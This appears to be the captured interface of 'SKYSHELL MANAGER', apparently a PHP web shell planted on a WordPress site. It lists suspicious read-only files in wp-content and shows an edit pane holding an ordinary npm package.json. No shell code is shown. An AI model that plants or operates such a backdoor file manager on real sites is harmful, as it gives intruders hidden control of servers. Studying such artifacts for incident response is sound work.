📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "supports-hyperlinks", "version": "3.0.0", "description": "Detect if your terminal emulator supports hyperlinks", "license": "MIT", "repository": "jamestalmage/supports-hyperlinks", "author": { "name": "James Talmage", "email": "james@talmage.io", "url": "github.com/jamestalmage" }, "engines": { "node": ">=14.18" }, "scripts": { "prepublishOnly": "npm run create-types", "test": "xo && nyc ava && tsc", "create-types": "tsc --project declaration.tsconfig.json" }, "files": [ "index.js", "index.d.ts", "browser.js" ], "browser": "browser.js", "keywords": [ "link", "terminal", "hyperlink", "cli" ], "dependencies": { "has-flag": "^4.0.0", "supports-color": "^7.0.0" }, "devDependencies": { "@tsconfig/node14": "^1.0.3", "@types/supports-color": "^8.1.1", "ava": "^2.2.0", "codecov": "^3.5.0", "nyc": "^14.1.1", "typescript": "^4.9.5", "xo": "^0.24.0" }, "nyc": { "reporter": [ "lcov", "text" ] } }
Save